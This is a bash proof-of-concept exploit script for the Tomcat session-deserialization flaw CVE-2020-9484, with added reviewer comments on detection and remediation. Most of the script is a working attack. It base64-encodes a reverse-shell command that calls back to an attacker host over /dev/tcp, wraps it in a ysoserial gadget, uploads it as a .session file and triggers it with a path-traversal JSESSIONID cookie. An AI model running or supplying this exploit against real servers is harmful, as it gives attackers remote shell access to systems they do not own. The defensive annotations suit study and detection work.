CVE-2020-9484.sh
#!/bin/bash
# Proof-of-concept driver for CVE-2020-9484 against a host serving upload.jsp
# on port 8080. Per the usage message the three arguments are:
#   $1 target host, $2 callback host, $3 callback port.
# Flow: build a serialized Java object with ysoserial, upload it as
# <random>.session through upload.jsp, then request the same page with a
# JSESSIONID cookie that is a relative path to the uploaded file.
#
# NOTE(review), defensive context: the two curl requests below are what a
# defender sees on the wire -- a multipart upload of a file named *.session,
# followed by a request whose JSESSIONID contains "../" sequences.
# Tomcat-generated session IDs do not contain path separators, so such a cookie
# is worth rejecting at the proxy/WAF and alerting on wherever cookies are
# logged. Remediation: run a Tomcat release that carries the fix for this CVE
# (see the vendor advisory for the affected configurations), store uploads
# where the session store cannot resolve them, do not let clients choose the
# stored file name/extension, and restrict outbound connections from the
# application server.

# ANSI escape sequences used for the status messages (reset, yellow, green).
NOCOLOR='\033[0m'
ORANGE='\033[0;33m'
GREEN='\033[0;32m'
# NOTE(review): args is only assigned two statements further down, so
# ${args[2]} expands to nothing here and the banner prints no port.
echo -e ${ORANGE}"[*]Dont forget netcat listener on port ${args[2]}"
echo -e ${NOCOLOR}
# Copy the positional parameters into an array: args[0]=target,
# args[1]=callback host, args[2]=callback port.
args=("$@")
# Five random alphanumeric characters; used as the upload's base file name,
# as the email query parameter and as the tail of the JSESSIONID path.
rng=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
# Exactly three arguments are required. The usage branch only prints a message;
# it does not set a failing exit status.
if [ "$#" -ne 3 ]; then
echo -e "\n\e[31m\e[1m[!] Wrong usage of parameters"
echo -e "\e[1m\e[34m[*] Example usage: ./CVE-2020-9484 target attacker port "
else
# Base64-encode a bash command line that connects an interactive shell to
# args[1]:args[2] through /dev/tcp.
payload=$(echo "bash -c 'bash -i >& /dev/tcp/${args[1]}/${args[2]} 0>&1'" | base64)
# Wrap the encoded command in a decode-and-run one-liner.
epayload="bash -c {echo,$payload}|{base64,-d}|{bash,-i}"
# Generate the serialized object with ysoserial's CommonsCollections2 payload
# and write it to <rng>.session in the current directory. The jar is expected
# in the current directory; the output file is not removed afterwards.
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections2 "$epayload" > $rng.session
echo -e ${ORANGE}"[*]Created file $rng.session"
echo -e ${NOCOLOR}
# Upload the file as multipart form field "image"; all curl output, including
# errors, is discarded.
curl -F "image=@${rng}.session" http://${args[0]}:8080/upload.jsp?email=$rng &> /dev/null
# Second request: the session cookie is a relative path into
# /opt/samples/uploads/ ending in the random name (without the .session
# suffix -- presumably the server-side session store appends it; confirm
# against the advisory). -L follows redirects; output is discarded again.
curl --cookie "JSESSIONID=../../../../../opt/samples/uploads/${rng}" -L http://${args[0]}:8080/upload.jsp?email=$rng &> /dev/null
echo -e ${ORANGE}"[*]Cookie manipulation completed"
echo -e ${NOCOLOR}
# NOTE(review): printed unconditionally. Neither curl's exit status nor the
# HTTP responses are inspected, so this message is not evidence that the
# target was affected -- or that it was not.
echo -e ${GREEN}"[*]Exploit ran succesfully"
echo -e ${NOCOLOR}
fi